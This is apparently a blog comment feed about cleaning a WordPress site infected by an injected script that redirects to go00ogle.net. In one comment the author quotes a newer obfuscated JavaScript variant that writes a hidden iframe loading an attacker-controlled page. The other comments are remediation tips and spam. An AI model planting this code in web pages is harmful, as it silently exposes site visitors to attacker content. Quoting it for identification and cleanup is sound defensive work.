tag:blogger.com,1999:blog-4472000937732072079.post3173229602185935684..comments2011-04-12T20:55:06.910+10:00ambanmbahttp://www.blogger.com/profile/14900206939894725159noreply@blogger.comBlogger16125tag:blogger.com,1999:blog-4472000937732072079.post-44473292839362415132011-03-20T01:23:54.390+11:002011-03-20T01:23:54.390+11:00This damn google infection! I HATE it.Vasyahttp://safetypeak.comnoreply@blogger.comtag:blogger.com,1999:blog-4472000937732072079.post-67679000204212981502010-11-06T19:31:51.012+11:002010-11-06T19:31:51.012+11:00Great resource now I won&#39;t need to totally rely on my website backup to counter an infectionSteve Robbinshttp://backup-smart.com/noreply@blogger.comtag:blogger.com,1999:blog-4472000937732072079.post-10197358508495160382010-09-24T20:06:28.422+10:002010-09-24T20:06:28.422+10:00Google infection made me spend few hours removeing it.Jameshttp://www.securitystronghold.com/noreply@blogger.comtag:blogger.com,1999:blog-4472000937732072079.post-67856515830003905692010-09-22T19:55:14.575+10:002010-09-22T19:55:14.575+10:00Thanks, really usefull.<br />Redirect virus is a real pain in the a...Redirect virushttp://www.securitystronghold.com/solutions/google-redirect-virus-removal.htmlnoreply@blogger.comtag:blogger.com,1999:blog-4472000937732072079.post-69899498948592064832010-08-29T00:08:23.224+10:002010-08-29T00:08:23.224+10:00Great resource thanksPeterhttp://www.outrightmobilephones.com.aunoreply@blogger.comtag:blogger.com,1999:blog-4472000937732072079.post-25727302356745958522009-10-24T20:54:53.667+11:002009-10-24T20:54:53.667+11:00great tutorial!<br />this info should help others with other infectionsnintendo ds gameshttp://www.zoombits.co.uk/games/ds-gamesnoreply@blogger.comtag:blogger.com,1999:blog-4472000937732072079.post-69333052428568004182009-08-12T07:35:49.514+10:002009-08-12T07:35:49.514+10:00A guy named Tyler from longren.org wrote in to say that the malicious code has evolved slightly. His site was infected with the following code (which you&#39;ll notice is slightly different than what is above). I suppose this is version 2.0.<br /><br />function advQuery(){<br /> var adv=&quot;http://google.com/&quot;;abs=unescape(&quot;%69%66%72%61%6D%65&quot;);Track=&quot;?sid=1&quot;;get=unescape(&quot;%6E%65%74&quot;);<br /> document.write(&quot;&lt;&quot;+abs+&quot; src=&quot;+adv.substr(0,9)+unescape(&quot;\u0030\u0030&quot;)+adv.substr(9,5));<br /> document.write(get+&quot;/go.php&quot;+Track+&quot; style=display:none&gt;&lt;&quot;+&quot;/&quot;+abs+&quot;&gt;&quot;);<br />};advQuery();ambanmbahttp://www.blogger.com/profile/14900206939894725159noreply@blogger.comtag:blogger.com,1999:blog-4472000937732072079.post-21198365191396454352009-08-11T07:09:46.513+10:002009-08-11T07:09:46.513+10:00@Rett, the effect on visitors would depend completely on the software the visitor was using to access the site (e.g. operating system, browser, add-ons). I didn&#39;t do an analysis of what the script did, but on my Mac / Firefox setup, it didn&#39;t seem to do anything. Often these things are quite benign at the beginning until there are enough sites activated - then they are &quot;switched on&quot; to do something. This is a good strategy for the malware writers because you can build up the number of infected sites &#39;quietly&#39; before activating them.ambanmbahttp://www.blogger.com/profile/14900206939894725159noreply@blogger.comtag:blogger.com,1999:blog-4472000937732072079.post-36086181833593549292009-08-11T07:05:47.968+10:002009-08-11T07:05:47.968+10:00@Casey, He was using the latest WP (2.8.x). A few days after removing the script, the script came back. I then asked him to change all his passwords (FTP, mySQL, etc.) and it&#39;s been fine ever since.ambanmbahttp://www.blogger.com/profile/14900206939894725159noreply@blogger.comtag:blogger.com,1999:blog-4472000937732072079.post-84036066951970399862009-08-11T00:59:11.754+10:002009-08-11T00:59:11.754+10:00Any idea what the script would do for visitors to an infected site? I have two wordpress sites that had this happen and I&#39;ve followed your instructions to remove, just worried about what damage has already been done.Retthttp://www.rettmartin.comnoreply@blogger.comtag:blogger.com,1999:blog-4472000937732072079.post-56185119088605606852009-07-29T07:08:36.816+10:002009-07-29T07:08:36.816+10:00It would be good to know the version of WordPress your friend was using and a list of plugins... or scripts. Doesn&#39;t chmodding the permissions of files appropriately stop such additions?<br /><br />I try to use the strictest permissions possible... even if it makes work for me when I need to edit files...Caseynoreply@blogger.comtag:blogger.com,1999:blog-4472000937732072079.post-86850279409590043412009-07-27T17:04:55.873+10:002009-07-27T17:04:55.873+10:00@emquis, My friend only found out because a bunch of the visitors to his site were complaining about it. The issue is that if you leave the infection on there, at some point Google will pull you from their search database. You can see this has happened to others if you do a Google search for go00ogle.net.ambanmbahttp://www.blogger.com/profile/14900206939894725159noreply@blogger.comtag:blogger.com,1999:blog-4472000937732072079.post-10756601583522005162009-07-27T17:02:25.777+10:002009-07-27T17:02:25.777+10:00@emqis, I think that the infection comes either from a bad WP Plugin or someone getting access to the FTP server and inserting the script into a file. Another way in would be via a known security hole somewhere else in the stack (e.g. web server, etc.)ambanmbahttp://www.blogger.com/profile/14900206939894725159noreply@blogger.comtag:blogger.com,1999:blog-4472000937732072079.post-8887889056565215062009-07-27T15:42:05.408+10:002009-07-27T15:42:05.408+10:00&#39;m also receiving various attacks in wp sites.<br />which includes framer virus - detected by AVG8<br /><br />they are adding some scripts on my wordpress blog index.php, wp-includes/filter.php and theme directory/index.phpnazcarhttp://www.nazcarpine.com/noreply@blogger.comtag:blogger.com,1999:blog-4472000937732072079.post-78884506165863401652009-07-27T15:21:26.230+10:002009-07-27T15:21:26.230+10:00Thanks for the informative tutorial!<br /><br />Do you have any idea how in the world the infection happened in the first place?<br /><br />Also, did your friend&#39;s computer come up with any adware or malware infections?<br /><br />I recently got a backdoor Trojan attachment to my SSH terminal application (I&#39;m on a Windows machine) and I&#39;m wondering if maybe that&#39;s how some other people have gotten these strange infections on their WP accounts.<br /><br />For myself, AVG caught the Trojan before it could do anything, so I haven&#39;t come up with any nasties... yet.<br /><br />Hopefully it stays that way!emgishttp://emgis.wordpress.com/noreply@blogger.comtag:blogger.com,1999:blog-4472000937732072079.post-65077211244065559702009-07-27T11:37:23.888+10:002009-07-27T11:37:23.888+10:00Good one. I hope it won&#39;t attack mine.Isaac | Go Blogger (dot) nethttp://www.goblogger.netnoreply@blogger.com